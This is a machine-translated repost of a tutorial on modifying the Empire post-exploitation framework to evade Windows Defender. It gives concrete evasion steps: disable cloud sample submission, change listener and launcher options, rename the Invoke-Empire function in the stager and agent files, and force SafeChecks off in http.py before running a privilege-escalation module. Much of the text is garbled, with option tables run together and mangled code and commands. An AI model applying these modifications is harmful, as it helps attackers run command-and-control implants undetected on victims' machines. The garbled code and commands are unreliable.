Shulou(Shulou.com)06/03 Report--

This article mainly introduces how to modify Empire to bypass Windows Defender, the article is very detailed, has a certain reference value, interested friends must read it!

Antivirus avoidance technology has always been one of the research directions that I am most interested in. When I started working on computer science many years ago, I proposed a topic to my consultants to improve antivirus engines to detect polymorphic viruses by mapping execution flows in binaries. However, with the deepening of the research, this idea was finally rejected, so I chose another research topic.

If your job is penetration testing or on the red team, then anti-virus bypass technology will be a necessary skill. But I have to say that this is also a frustrating area-although "signature-based" antivirus software does not do much to stop threats, it can sometimes cause us a lot of trouble.

We know that the best way to avoid antivirus software is to "write your own tools". For example, write your own simple reverse shell, or if you have enough money and time, you can try to develop a complete C2 architecture from scratch. However, most people still rely on open source (and commercial) tools developed by others in the secure community.

Speaking of which, I have to mention Empire. Empire is a post-penetration agent tool that contains a variety of offensive tools. This is a very powerful tool that can be used as part of an aggressive operation if it is not marked by an antivirus program during execution. There was a time when Empire was very useful for avoiding programs like Windows Defender. But not anymore. If you create a generic http listener agent payload and execute it in memory, without even touching the disk, you may see something like this.

As you can see, Windows Defender detects and blocks our behavior.

But don't forget that Empire is a free and open source tool, and we can try to bypass client-side antivirus software by modifying some key areas.

Before we start our testing, let's turn off "Cloud-delivered Protection" in Windows Defender, especially "automatic sample submission (Automatic sample submission)". We don't want any of our tests to be connected to the Internet and into Windows Defender's distributed signature. In addition, please maintain "real-time protection (Real-time protection)" so that we can test the execution.

Remember! Whatever you do, don't upload the virus to VIRUS TOTAL! Or all your efforts will be in vain! As you will learn below, Windows Defender can detect Empire even if the initial payload passes the antivirus check.

Now that our test lab environment is ready, it's time to start using Empire.

In previous attempts to bypass Windows Defender, I set the misc option within Empire launcher payload, but failed.

Then I tried to get around it through confusion. I tried to use the powershell obfuscation tool to run the payload. Run it through Unicorn.? Failed. Run it through Veil Framework.? Failed. Run it through Empire's own native Invoke-Obfuscation.? Still failed.

But I noticed that by using the obfuscation tool I was able to write payload to disk, basically bypassing antivirus signatures, but being detected and blocked at execution time.

Dissecting Empire

The initial payload generated by Empire is called "stager", which should be stage0 payload to be exact. Stager is code that remotely downloads and executes another stager or actual payload. In our example, we will use multi/launcher powershell stager to get the http listener.

Testing stage0 payload is actually very simple. Generate payload, write it to a file, and then transfer it to the Windows machine. If it triggers an antivirus warning when it hits the disk, you have a lot of other work to do. If it is successfully transferred and executed normally, you have obtained an available stager.

A very important explanation! During my testing, I encountered a problem, that is, after repeated payload tests, Windows Defender is likely to mark all powershell files as viruses or even empty files! If this happens, restart VM or your computer. In my opinion, Windows Defender may know that the host on which I am transferring the file is malicious, so PowerShell will be disabled no matter what the file is.

You may be shocked to generate a multi/launcher stager that bypasses Windows Defender by using the options shown in Empire. But I won't tell you the exact options I use, because I know someone will use them immediately and ignore my warnings to upload them to Virus Total. But I will show you the options that I propose to change.

Recommended modified Empire http listener options

Option describes the three URL and User-Agent strings that the default profile Empire will call at different times. / admin/get.php,/news.php,/login/process.php | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko server version Web server version identifier Microsoft-IIS/7.5 host your host (or IP) and port number. The port should be the same as the specified host port the user agent sent by the user agent Empire to simulate real Web browser traffic. The URI provided to Stager by Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36StagerURI. / download must be included to work without additional modifications. The default self-signed certificate when setting Empire in the certificate path is at. / Empire/Data. Depending on the complexity of the environment, the self-signed certificate may not work. Windows Defender doesn't mind self-signed certificates. The default Jitter random delay when sending beacon calls to the Empire server. 0.0Launcher is used to execute the command of stager. Powershell-noP-sta-w 1-enc

Recommended modified Empire multi/launcher options

Option describes the default Listener item is required UserAgent user agent string SafeChecks attempts to detect whether launcher is running in a sandbox. True obfuscates automatically generated launcher code. The obfuscation command used by the False obfuscation command. Token\ All\ 1Launcher\ STDIN++\ 12467

Here's a hint. Set SafeChecks to false. SafeChecks attempts to determine if stager is running in an antivirus sandbox. In addition, it also reduces a lot of generated code, but because we are detected by antivirus software, it obviously doesn't work properly.

With such a payload that we have "weaponized", does it mean that we must be able to run Empire? Payload will be executed as shown below, and you will see an initial connection to Sending stage 1! Then there was a problem.

During the test, I decided to turn off antivirus protection, start Empire on the Windows host, and then restart the antivirus software. To my excitement, my Empire beacon is not dead! As long as we can get Empire started. But why can't it start?

Digging into the Empire code base generates stage1 code. This code establishes an encrypted security environment to avoid detection, but it itself is not encoded in any way. After some tests and errors, I edited the file and some parts, and I determined that the problem should be the invokeEmpire function name. As suggested in the Black Hills Information Security article, changing the function name to invoke randomstringhere is a necessary means to prevent detection. Although all we have to do is modify the name of the invokeEmpire function, it would be a huge addition if you could make further changes to the stage1 code.

Edit:. / Empire/data/agent/stagers/http.ps1:

Invoke-Empire-Servers @ (($s-split "/") [0.2]-join "/")-StagingKey $SK-SessionKey $key-SessionID $ID-WorkingHours "WORKING_HOURS_REPLACE"-KillDate "REPLACE_KILLDATE"-ProxySettings $Script:Proxy

Edit:. / Empire/data/agent/agent.ps1

Function Invoke-Empire {

Let's try running our Empire stager again.

You can see that we have successfully bypassed Windows Defender!

Because the test is run on a fully patched Win10 host, there are not many ways to elevate rights. So let's try the powershell/privesc/ask module, which will pop up a dialog box asking the user if they want to run powershell as an administrator. Vulnerability exploitation successfully pops up the dialog box, which is a good sign! I click Yes! But nothing happened.

I admit it makes me feel a little confused. If my stagers works during initial utilization, why can't I raise the rights? After some debugging, I was able to capture the stager sent using the privesc/ask module. Although it contains some of the changes I set up in the multi/launcher configuration, there is a clear difference. It also contains the SafeChecks code that we set to False!

I'm not sure if the SafeChecks included here is caused by the bug that exists in the Empire. However, there is a current problem with the SafeChecks code, which seems to have been confirmed by the Empire bug. Just keep the option setting to False all the time to solve our problem.

Edit:. / Empire/lib/listeners/http.py:

Def generate_launcher (self, encode=True, obfuscate=False, obfuscationCommand= ", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):" Generate a basic launcher for the specified listener. "# Add this line to override SafeChecks safeChecks='False'

Run `python-m roomeall` and restart Empire. Then start powershell/privesc/ask.

The above is all the contents of the article "how to modify Empire to bypass Windows Defender". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.